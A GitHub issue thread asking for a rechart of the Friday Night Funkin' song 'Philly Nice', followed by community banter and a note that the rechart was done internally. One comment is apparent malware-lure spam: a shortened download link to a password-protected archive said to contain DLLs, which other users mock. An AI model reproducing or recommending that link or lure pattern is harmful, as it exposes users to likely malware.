### ISSUE TITLE
Enhancement: Rechart Philly Nice (Serious)

### ISSUE THREAD

**Issue by Average-FNF-Modder** [FunkinCrew/Funkin#3392]
### Issue Checklist

- [X] I have properly named the enhancement
- [X] I have checked the issues/discussions pages to see if the enhancement has been previously suggested

### What is your suggestion, and why should it be implemented?

If Guns got a rechart, I see no reason why other old charts can't be redone as well. It's one of the worst charts in the game as of now, horrible patterning, numerous charting mistakes, it just doesn't feel or look good, and I think it deserves to be redone. Please hear me out.

**Comment by Kevin-Otalvares** [comment]
download
https://bit.ly/4gABgKn
Archive password: changeme
I put the necessary dlls in the archive

**Comment by moxie-coder** [comment]
> download https://bit.ly/4gABgKn Archive password: changeme I put the necessary dlls in the archive


https://github.com/user-attachments/assets/15dd58a2-ab28-40d9-bcb4-fd4e8d5206fa

**Comment by Average-FNF-Modder** [comment]
Ok deadass why does this keep happening

**Comment by Hundrec** [comment]
> Ok deadass why does this keep happening

He's being generous and putting in the necessary dlls for the rechart

**Comment by Average-FNF-Modder** [comment]
> > Ok deadass why does this keep happening
> 
> He's being generous and putting in the necessary dlls for the rechart

Thank you Hundrec FNF.

![wahoo timer moment](https://github.com/user-attachments/assets/07df6b49-424a-42b4-beaa-1250e941d3fa)

**Comment by AbnormalPoof** [comment]
... I mean...
![screenshot-2024-09-20-20-01-01](https://github.com/user-attachments/assets/fdf9a1fd-c108-46ee-bec7-5ddccf21cbe8)

**Comment by Hundrec** [comment]
> ... I mean...
> 
> ![screenshot-2024-09-20-20-01-01](https://github.com/user-attachments/assets/fdf9a1fd-c108-46ee-bec7-5ddccf21cbe8)
> 
> 

That'll have to wait until the chart editor is patched :(

**Comment by AbnormalPoof** [comment]
Fair enough, PR #3337 is in the `0.5.1` milestone, though. So hopefully it doesn't take too long for the patch to come out.

**Comment by Average-FNF-Modder** [comment]
> ... I mean... ![screenshot-2024-09-20-20-01-01](https://private-user-images.githubusercontent.com/86753001/369585905-fdf9a1fd-c108-46ee-bec7-5ddccf21cbe8.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjY4ODc3ODUsIm5iZiI6MTcyNjg4NzQ4NSwicGF0aCI6Ii84Njc1MzAwMS8zNjk1ODU5MDUtZmRmOWExZmQtYzEwOC00NmVlLWJlYzctNWRkY2NmMjFjYmU4LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MjElMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTIxVDAyNTgwNVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWExMjgwZmEwNzhiNmEzNmUwOTczMzU2NzJiNDliYWFjYjgyMDVmYjY0OWZhMGMyNWZiMTBjOWQxZjcwMzBjYWEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.t5EtZxj7PBmv2zf4TkbUX-2dTqndP6H_Nlah-xFOT7k)

When they fix chart editor my ass will be on that song

**Comment by EliteMasterEric** [comment]
This got done internally

**Comment by dougy2shoez** [comment]
gonna miss the old charts tbh
